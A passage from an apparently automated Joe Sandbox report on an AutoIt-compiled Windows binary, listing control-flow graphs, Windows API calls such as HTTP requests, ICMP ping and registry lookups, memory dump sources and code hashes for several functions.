788860-788863 216->219 220 788852-78885b 216->220 217->216 218->65 221 788873-788876 219->221 222 788865-78886e 219->222 220->219 221->65 223 78887c-78888a 221->223 222->221 223->65
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 4|$@|$P|$`|$d0b$d10m0$d1b$d1r0,2$d5m0$i$t|$t|$|$|
                                                                                                                                                                                          • API String ID: 0-634568145
                                                                                                                                                                                          • Opcode ID: 97138074352d123a977791e0ea8b3db878d8d23e1b274f5ab9a665c645e5c3fa
                                                                                                                                                                                          • Instruction ID: 45d8caf667df1b69ca45c83ed3062b51685f5fc6a890f785b792141f214121e3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 97138074352d123a977791e0ea8b3db878d8d23e1b274f5ab9a665c645e5c3fa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F624970508345CFC764DF24C099AAABBE1FF88304F54896EE4998B352DB79E945CF82
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 224 7acebb-7aced3 225 7acedd-7aceff InternetConnectW 224->225 226 7aced5-7aceda 224->226 227 7acf29-7acf3f HttpOpenRequestW 225->227 228 7acf01-7acf19 GetLastError 225->228 226->225 231 7acf4d-7acf50 227->231 232 7acf41-7acf48 227->232 229 7acf1b-7acf1c SetEvent 228->229 230 7acf22-7acf24 228->230 229->230 233 7ad048-7ad04c 230->233 235 7acf5d-7acf64 231->235 236 7acf52-7acf58 call 7ada46 231->236 234 7ad021-7ad032 GetLastError 232->234 237 7ad03b-7ad03d 234->237 238 7ad034-7ad035 SetEvent 234->238 240 7acf66-7acf8e InternetQueryOptionW InternetSetOptionW 235->240 241 7acf94-7acfa1 HttpSendRequestW 235->241 236->235 242 7ad03f-7ad040 InternetCloseHandle 237->242 243 7ad046 237->243 238->237 240->241 244 7ad01a 241->244 245 7acfa3-7acfae call 7ace7c 241->245 242->243 243->233 244->234 245->244 248 7acfb0-7acfe8 HttpQueryInfoW call 75666b 245->248 251 7acfea-7acff0 248->251 252 7ad002-7ad00d 248->252 253 7acff9 call 7ad889 251->253 254 7acff2 call 7ad95f 251->254 255 7ad00f-7ad010 SetEvent 252->255 256 7ad016-7ad018 252->256 260 7acffe-7ad000 253->260 259 7acff7 254->259 255->256 256->237 259->260 260->237
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007ACEF5
                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 007ACF08
                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 007ACF1C
                                                                                                                                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 007ACF35
                                                                                                                                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 007ACF78
                                                                                                                                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 007ACF8E
                                                                                                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007ACF99
                                                                                                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 007ACFC9
                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 007AD021
                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 007AD035
                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 007AD040
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3800310941-3916222277
                                                                                                                                                                                          • Opcode ID: 5e8766afd4fe0b9f4596872e07fad1c4799dd07e9e802580694f5c7bedce9419
                                                                                                                                                                                          • Instruction ID: b175539e919336e0c62baeaa3097bc0393e9fc3fb762e3b2064f79d535f3e6e9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e8766afd4fe0b9f4596872e07fad1c4799dd07e9e802580694f5c7bedce9419
                                                                                                                                                                                          • Instruction Fuzzy Hash: FE514DB1500604BFDB329F60C988EAB7BBCFF8A744F00852DF94696550D778DD459B60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00733657
                                                                                                                                                                                          • RegisterClassExW.USER32(00000030), ref: 00733681
                                                                                                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00733692
                                                                                                                                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 007336AF
                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007336BF
                                                                                                                                                                                          • LoadIconW.USER32(000000A9), ref: 007336D5
                                                                                                                                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007336E4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                          • String ID: +$0$0+m"s$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                          • API String ID: 2914291525-3265637659
                                                                                                                                                                                          • Opcode ID: ac6169830662bd7c0f0c5941472c29304645d71393e4e6068adca701c93d7574
                                                                                                                                                                                          • Instruction ID: 8d7dfe895b4f2ca3421d072a40c13b29ea3a5de3d84a79c2008d12a265905c62
                                                                                                                                                                                          • Opcode Fuzzy Hash: ac6169830662bd7c0f0c5941472c29304645d71393e4e6068adca701c93d7574
                                                                                                                                                                                          • Instruction Fuzzy Hash: DC21C3B1D01218AFDB50DFA8EC89F9DBBB4FB08710F00812AF515A62A0D7B949448F94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 393 7709db-770a0b call 7707af 396 770a26-770a32 call 765594 393->396 397 770a0d-770a18 call 75f636 393->397 403 770a34-770a49 call 75f636 call 75f649 396->403 404 770a4b-770a94 call 77071a 396->404 402 770a1a-770a21 call 75f649 397->402 414 770cfd-770d03 402->414 403->402 412 770a96-770a9f 404->412 413 770b01-770b0a GetFileType 404->413 416 770ad6-770afc GetLastError call 75f613 412->416 417 770aa1-770aa5 412->417 418 770b53-770b56 413->418 419 770b0c-770b3d GetLastError call 75f613 CloseHandle 413->419 416->402 417->416 422 770aa7-770ad4 call 77071a 417->422 420 770b5f-770b65 418->420 421 770b58-770b5d 418->421 419->402 430 770b43-770b4e call 75f649 419->430 426 770b69-770bb7 call 7654dd 420->426 427 770b67 420->427 421->426 422->413 422->416 436 770bc7-770beb call 7704cd 426->436 437 770bb9-770bc5 call 77092b 426->437 427->426 430->402 442 770bfe-770c41 436->442 443 770bed 436->443 437->436 444 770bef-770bf9 call 768a2e 437->444 446 770c43-770c47 442->446 447 770c62-770c70 442->447 443->444 444->414 446->447 449 770c49-770c5d 446->449 450 770c76-770c7a 447->450 451 770cfb 447->451 449->447 450->451 452 770c7c-770caf CloseHandle call 77071a 450->452 451->414 455 770ce3-770cf7 452->455 456 770cb1-770cdd GetLastError call 75f613 call 7656a6 452->456 455->451 456->455
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0077071A: CreateFileW.KERNEL32(00000000,00000000,?,00770A84,?,?,00000000,?,00770A84,00000000,0000000C), ref: 00770737
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00770AEF
                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00770AF6
                                                                                                                                                                                          • GetFileType.KERNEL32(00000000), ref: 00770B02
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00770B0C
                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00770B15
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00770B35
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00770C7F
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00770CB1
                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00770CB8
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                          • API String ID: 4237864984-2852464175
                                                                                                                                                                                          • Opcode ID: 4b1a0cdccb7b2cdfa50c6716c73fe89ed750b87663f57aae682b2f70485d378f
                                                                                                                                                                                          • Instruction ID: 47c6007881b66fa8e77db9aaeb0d9207a3db47125aadb11f8c1f784ed0fc065a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b1a0cdccb7b2cdfa50c6716c73fe89ed750b87663f57aae682b2f70485d378f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FA13532A00149CFCF19AF78DC56BAE3BA0EB06324F148159F815DB2E1DB399D12CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00735594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00774B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 007355B2
                                                                                                                                                                                            • Part of subcall function 00735238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0073525A
                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 007353C4
                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00774BFD
                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00774C3E
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00774C80
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00774CE7
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00774CF6
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                          • API String ID: 98802146-2727554177
                                                                                                                                                                                          • Opcode ID: c72acf9a930c98513379b833a3263dc61eab4e9bc792ef17df1fe0a6aa42f6de
                                                                                                                                                                                          • Instruction ID: eb8940c1910c43a3d37dad192a108423d1ded78ce35d870ad1423c24e1ad02c2
                                                                                                                                                                                          • Opcode Fuzzy Hash: c72acf9a930c98513379b833a3263dc61eab4e9bc792ef17df1fe0a6aa42f6de
                                                                                                                                                                                          • Instruction Fuzzy Hash: C171CF71104301EED714EF69EC8599BBBECFF98340F40442EF545872A1EB799A48CBA2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 007334DE
                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 007334ED
                                                                                                                                                                                          • LoadIconW.USER32(00000063), ref: 00733503
                                                                                                                                                                                          • LoadIconW.USER32(000000A4), ref: 00733515
                                                                                                                                                                                          • LoadIconW.USER32(000000A2), ref: 00733527
                                                                                                                                                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0073353F
                                                                                                                                                                                          • RegisterClassExW.USER32(?), ref: 00733590
                                                                                                                                                                                            • Part of subcall function 00733624: GetSysColorBrush.USER32(0000000F), ref: 00733657
                                                                                                                                                                                            • Part of subcall function 00733624: RegisterClassExW.USER32(00000030), ref: 00733681
                                                                                                                                                                                            • Part of subcall function 00733624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00733692
                                                                                                                                                                                            • Part of subcall function 00733624: InitCommonControlsEx.COMCTL32(?), ref: 007336AF
                                                                                                                                                                                            • Part of subcall function 00733624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007336BF
                                                                                                                                                                                            • Part of subcall function 00733624: LoadIconW.USER32(000000A9), ref: 007336D5
                                                                                                                                                                                            • Part of subcall function 00733624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007336E4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                          • String ID: #$0$AutoIt v3
                                                                                                                                                                                          • API String ID: 423443420-4155596026
                                                                                                                                                                                          • Opcode ID: 3ad4ae510091b04ed3c24587981dcd715fdd65ffcfb52a99750712c998919c03
                                                                                                                                                                                          • Instruction ID: 227278846a9d31b8ef3ebad7b30a232c53b08632164ec580da88e925b971a5c4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ad4ae510091b04ed3c24587981dcd715fdd65ffcfb52a99750712c998919c03
                                                                                                                                                                                          • Instruction Fuzzy Hash: A9211A70D00318ABDB609FA9EC59AA9BFB4FB08B50F01402AE604A63B0D7F949458F94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 534 7b0fb8-7b0fef call 73e6a0 537 7b100f-7b1021 WSAStartup 534->537 538 7b0ff1-7b0ffe call 73c98d 534->538 539 7b1023-7b1031 537->539 540 7b1054-7b1091 call 74c1f6 call 738ec0 call 74f9d4 inet_addr gethostbyname 537->540 538->537 549 7b1000-7b100b call 73c98d 538->549 542 7b1033 539->542 543 7b1036-7b1046 539->543 557 7b1093-7b10a0 IcmpCreateFile 540->557 558 7b10a2-7b10b0 540->558 542->543 546 7b104b-7b104f 543->546 547 7b1048 543->547 550 7b1249-7b1251 546->550 547->546 549->537 557->558 559 7b10d3-7b1100 call 75017b call 73423c 557->559 560 7b10b2 558->560 561 7b10b5-7b10c5 558->561 570 7b112b-7b1148 IcmpSendEcho 559->570 571 7b1102-7b1129 IcmpSendEcho 559->571 560->561 562 7b10ca-7b10ce 561->562 563 7b10c7 561->563 565 7b1240-7b1244 call 73bd98 562->565 563->562 565->550 572 7b114c-7b114e 570->572 571->572 573 7b11ae-7b11bc 572->573 574 7b1150-7b1155 572->574 575 7b11be 573->575 576 7b11c1-7b11c8 573->576 577 7b115b-7b1160 574->577 578 7b11f8-7b120a call 73e6a0 574->578 575->576 580 7b11e4-7b11ed 576->580 581 7b11ca-7b11d8 577->581 582 7b1162-7b1167 577->582 589 7b120c-7b120e 578->589 590 7b1210 578->590 586 7b11ef 580->586 587 7b11f2-7b11f6 580->587 584 7b11da 581->584 585 7b11dd 581->585 582->573 588 7b1169-7b116e 582->588 584->585 585->580 586->587 591 7b1212-7b1229 IcmpCloseHandle WSACleanup 587->591 592 7b1193-7b11a1 588->592 593 7b1170-7b1175 588->593 589->591 590->591 591->565 597 7b122b-7b123d call 75013d call 750184 591->597 595 7b11a3 592->595 596 7b11a6-7b11ac 592->596 593->581 594 7b1177-7b1185 593->594 598 7b118a-7b1191 594->598 599 7b1187 594->599 595->596 596->580 597->565 598->580 599->598
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WSAStartup.WSOCK32(00000101,?), ref: 007B1019
                                                                                                                                                                                          • inet_addr.WSOCK32(?), ref: 007B1079
                                                                                                                                                                                          • gethostbyname.WS2_32(?), ref: 007B1085
                                                                                                                                                                                          • IcmpCreateFile.IPHLPAPI ref: 007B1093
                                                                                                                                                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007B1123
                                                                                                                                                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007B1142
                                                                                                                                                                                          • IcmpCloseHandle.IPHLPAPI(?), ref: 007B1216
                                                                                                                                                                                          • WSACleanup.WSOCK32 ref: 007B121C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                          • String ID: Ping
                                                                                                                                                                                          • API String ID: 1028309954-2246546115
                                                                                                                                                                                          • Opcode ID: a3a4a3a52172ae8f90f35eae1498d3612728f46b7c46d5edf58b1a196263acb1
                                                                                                                                                                                          • Instruction ID: 1be08fa0b2e20d1076285697e2593fcc2a25a1090fe18c1e5bb5dd99b43f247c
                                                                                                                                                                                          • Opcode Fuzzy Hash: a3a4a3a52172ae8f90f35eae1498d3612728f46b7c46d5edf58b1a196263acb1
                                                                                                                                                                                          • Instruction Fuzzy Hash: D891DF31604205DFD720DF19C898F96BBE0FF44318F9585A9F5698B6A2C738ED45CB81
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 604 73370f-733724 605 733726-733729 604->605 606 733784-733786 604->606 607 73372b-733732 605->607 608 73378a 605->608 606->605 609 733788 606->609 610 733804-73380c PostQuitMessage 607->610 611 733738-73373d 607->611 613 773df4-773e1c call 732f92 call 74f23c 608->613 614 733790-733795 608->614 612 73376f-733777 DefWindowProcW 609->612 619 7337b8-7337ba 610->619 615 733743-733747 611->615 616 773e61-773e75 call 79c8f7 611->616 618 73377d-733783 612->618 650 773e21-773e28 613->650 620 733797-73379a 614->620 621 7337bc-7337e3 SetTimer RegisterWindowMessageW 614->621 624 73380e-733818 call 74fcad 615->624 625 73374d-733752 615->625 616->619 643 773e7b 616->643 619->618 622 773d95-773d98 620->622 623 7337a0-7337b3 KillTimer call 733907 call 7359ff 620->623 621->619 626 7337e5-7337f0 CreatePopupMenu 621->626 635 773dd0-773def MoveWindow 622->635 636 773d9a-773d9e 622->636 623->619 645 73381d 624->645 630 773e46-773e4d 625->630 631 733758-73375d 625->631 626->619 630->612 640 773e53-773e5c call 791423 630->640 641 733763-733769 631->641 642 7337f2-733802 call 73381f 631->642 635->619 637 773da0-773da3 636->637 638 773dbf-773dcb SetFocus 636->638 637->641 646 773da9-773dba call 732f92 637->646 638->619 640->612 641->612 641->650 642->619 643->612 645->619 646->619 650->612 654 773e2e-773e41 call 733907 call 73396b 650->654 654->612
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00733709,?,?), ref: 00733777
                                                                                                                                                                                          • KillTimer.USER32(?,00000001,?,?,?,?,?,00733709,?,?), ref: 007337A3
                                                                                                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007337C6
                                                                                                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00733709,?,?), ref: 007337D1
                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 007337E5
                                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00733806
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                          • String ID: TaskbarCreated
                                                                                                                                                                                          • API String ID: 129472671-2362178303
                                                                                                                                                                                          • Opcode ID: 3d3a04394607f73d8660e3f401e918c11da35a970253353c15e484199eb542da
                                                                                                                                                                                          • Instruction ID: 832367a66a653c33e3cd811e6e29bf2a3e77f25a8c102248f743cddbe26b4ace
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d3a04394607f73d8660e3f401e918c11da35a970253353c15e484199eb542da
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3241B3F1200245FBFB342B789C9DFB93B69FB14301F148229F505892A2DABC9F459761
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
